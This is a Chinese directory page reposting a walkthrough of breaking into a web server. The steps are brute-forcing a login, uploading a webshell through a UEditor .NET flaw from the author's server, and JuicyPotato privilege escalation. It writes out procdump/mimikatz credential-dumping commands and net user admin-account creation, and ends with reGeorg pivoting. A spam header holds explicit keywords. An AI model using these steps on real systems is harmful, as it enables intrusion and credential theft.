日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747


本次教程較為基礎,打碼比較嚴重,有很多不足的地方,希望各位大佬能夠指正。

目標站:http://xxx.com 要求:登錄遠程桌面

通過 超級ping 檢測出網站的IP 直接訪問ip ...

騷操作實戰擼進內網服務器

 

通過FOFA Pro View 這個插件可以快速的掃描出開放的端口 (由于更新,之前的不能用了,修改下地址就可以了)

騷操作實戰擼進內網服務器

 

還有WAppalyzer 這個插件也比較好用快速檢測出網站的中間件等

騷操作實戰擼進內網服務器

 

這里我比較疑惑asp.net 一般都是搭配mssql數據庫吧,它上面顯示開放3306。。。

我訪問一下直接 403

目錄掃描掃出了后臺

騷操作實戰擼進內網服務器

 

嘗試下弱口令

騷操作實戰擼進內網服務器

 


騷操作實戰擼進內網服務器

 

他這里會校驗用戶名 ,通過檢測不會對訪問次數進行限制 ,那還等啥!

burp一梭跑 剛好讓他嘗嘗我大字典的厲害

騷操作實戰擼進內網服務器

 

最終我還是敗了,啥也別說了,上神器xray

出來打工,之前白嫖的高級版還沒上手,今天試試水,

貼出xray的官方使用說明 https://docs.xray.cool/#/tutorial/introduce 這款工具還是蠻好用的,

啥也不說,開干(我懶,就使用基礎爬蟲+掃描網站了)。

騷操作實戰擼進內網服務器

 

。。。有點尬 只能手動測試下了, 習慣性的查看一下有沒有目錄遍歷漏洞 (我自己的手法: 找到一張圖片->右鍵復制地址到地址欄->查看相關路徑->訪問)(注意:圖片一般最好選擇文章或者資料里面的 別問,問就是直覺)

騷操作實戰擼進內網服務器

 

哦啊,沒發現目錄遍歷但是發現了ueditor,聯想到之前插件掃到的web框架是 .net的 有篇文章是專門講解有關Ueditor .net下的漏洞的 https://www.freebuf.com/vuls/181814.html

先訪問一下路徑顯示

騷操作實戰擼進內網服務器

 

利用poc上傳(自己構造好html上傳界面,然后上傳自己服務器上的圖片馬用 ? 進行截斷就可以了)

(服務器:白嫖一年彩虹云云主機 圖片馬: 非常簡單,我們只需要一張圖片1.jpg 一句話木馬寫好的aspx文件 1.aspx,之后我們進入到命令行。

注意:將aspx文件和圖片文件放到同一目錄下,cmd也要跳轉到放文件的目錄下之后執行命令 copy 1.jpg/b + 1.aspx/a 2.jpg 新生成的2.jpg就是我們制作好的圖片馬了。)

將POC中的url更換成我們的目標站,上傳格式 http://myweb.com/1.jpg?.aspx

騷操作實戰擼進內網服務器

 


騷操作實戰擼進內網服務器

 

上傳成功 直接返回一句話地址

騷操作實戰擼進內網服務器

 

成功解析,上菜刀

騷操作實戰擼進內網服務器

 

成功getshell ,查看下權限

騷操作實戰擼進內網服務器

 

這權限屬實有點小,不過還能執行命令 ipconfig 發現是 內網。。。怪不得

騷操作實戰擼進內網服務器

 

Systeminfo

騷操作實戰擼進內網服務器

 


騷操作實戰擼進內網服務器

 

2012 修補了8個補丁 先祭出神站https://bugs.hacking8.com/tiquan/ 在線 exp對比,非常值得推薦

這里看到2012 啥也別說爛土豆一梭跑

發現上傳不上。。。

騷操作實戰擼進內網服務器

 

剛開始我以為是權限的問題后來發現每個文件夾我都不能上傳。。。

搞得我一臉懵* 是不是因為菜刀的問題 那就直接先寫入一個aspx的查詢可讀可寫目錄的馬子

騷操作實戰擼進內網服務器

 

成功寫入并查詢成功 然后新建一個大馬

騷操作實戰擼進內網服務器

 

不是吧,這么難的嗎? 還好我有預編譯出錯的shell

騷操作實戰擼進內網服務器

 

成功 然后配合我的可讀可寫的馬子 成功上傳爛土豆

騷操作實戰擼進內網服務器

 

提權成功 get到system 權限 接下來就是找3389了 netstat -ano

騷操作實戰擼進內網服務器

 

看到一個 33890 越看越像3389 tasklist -svc : 查看系統進程 找到對應的pid

騷操作實戰擼進內網服務器

 


騷操作實戰擼進內網服務器

 

不得不吐槽一下這個管理員 真的有點2...3389端口到手,內網IP到手,system權限到手,接下來直接添加賬號登錄了

Net user abc abc /add 添加賬號net localgroup administrators abc /add 將用戶添加到管理員組

執行命令發現無回顯,剛開始以為對賬號密碼的長度有限制,但是測試了很多次發現不是這個問題,明明是system權限為什么不能添加用戶呢?

在白天打工的時候用手機找到很多類似對應的情況:有殺軟、對賬號密碼有限制、防火墻等等 并且從網上找到了很多繞過的姿勢 晚上回到家二話不說就開干,tasklist -svc

騷操作實戰擼進內網服務器

 

經過我一個一個的百度,終于發現了問題所在 原來存在火絨。。。(對殺毒軟件進程不是很了解)

其實這里我想說明一下,很多人習慣性的遇到一點很問題就問別人,其實完全可以自己先百度一下,這樣不僅可以加深對問題的記憶,將來在遇到同類型問題的時候也可以快速的找到解決的思路

利用白天找到的思路,可以先kill掉火狐的進程這里我就直接貼出方法 https://jingyan.baidu.com/article/656db9183f65c0e381249c83.html

但是事情往往是那么的不盡人意

騷操作實戰擼進內網服務器

 

。。。 n m 玩雞毛 再試試另一種方法,直接mimimakatz讀取administrator的密碼

但是這里是server2012 嘗試使用procdump來導出目標主機的lsass.dmp 到本機用mimikatz讀取密碼

1.導出lsass.exeprocdump64.exe -accepteula -ma lsass.exe lsass.dmp

2.執行mimikatzmimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(前提需要管理員權限)

讀出了hash沒讀出明文密碼

騷操作實戰擼進內網服務器

 

Sha1解密不出來 還嘗試了很多姿勢,都沒有成功,只能求助大佬了

騷操作實戰擼進內網服務器

 

啥話不說直接開干

+

騷操作實戰擼進內網服務器

 

成功繞過并添加到了管理員組,由于是內網我們直接上 Proxifier+reGeorg(之前遇到過一次內網的環境就是用的這個組合)相關使用方法可以參考:https://www.freebuf.com/column/206524.html 進行了解

然后 就。。。

騷操作實戰擼進內網服務器

 

任務完成 打掃戰場 收工

總結:

安裝相關瀏覽器插件會很方便的進行信息收集遇到問題不要一股腦的問別人,

先想辦法自己解決多收集一些好用的工具、網站等,

用的時候直接就能甩過來多總結自己的經驗和收獲,這樣你才能在實戰中快速上手

轉載自:https://xz.aliyun.com/t/8083

分享到:
標簽:內網 服務器
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定